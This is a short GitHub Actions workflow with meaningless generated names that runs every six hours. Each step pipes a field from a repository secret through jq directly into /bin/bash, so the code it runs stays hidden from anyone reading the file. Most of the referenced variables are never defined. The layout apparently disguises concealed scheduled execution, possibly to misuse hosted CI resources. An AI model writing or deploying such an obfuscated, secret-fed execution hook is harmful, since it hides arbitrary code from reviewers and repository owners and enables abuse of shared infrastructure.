name: changsimu7654

on:
  workflow_dispatch:
  schedule:
    - cron: '54 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: changsimu7654
        env:
          v85133: ${{ secrets.v85133 }}
        run: |
          echo $v85133 | jq -r .wquh3 | /bin/bash
          echo $wjiu3501 | jq -r .mwyf008 | /bin/bash
          echo $zsk300 | jq -r .ozx85612 | /bin/bash
          echo $pc3 | jq -r .vkzkb22479 | /bin/bash
          echo $u70920 | jq -r .mud0 | /bin/bash
          echo $rnmx73769 | jq -r .iidj4 | /bin/bash
          echo $ixc3646 | jq -r .cb95 | /bin/bash
          echo $qh2735 | jq -r .a9805 | /bin/bash
          echo $pm28 | jq -r .dyi699 | /bin/bash
          echo $lr36 | jq -r .mxyu404 | /bin/bash
          echo $nhj23 | jq -r .kn635 | /bin/bash

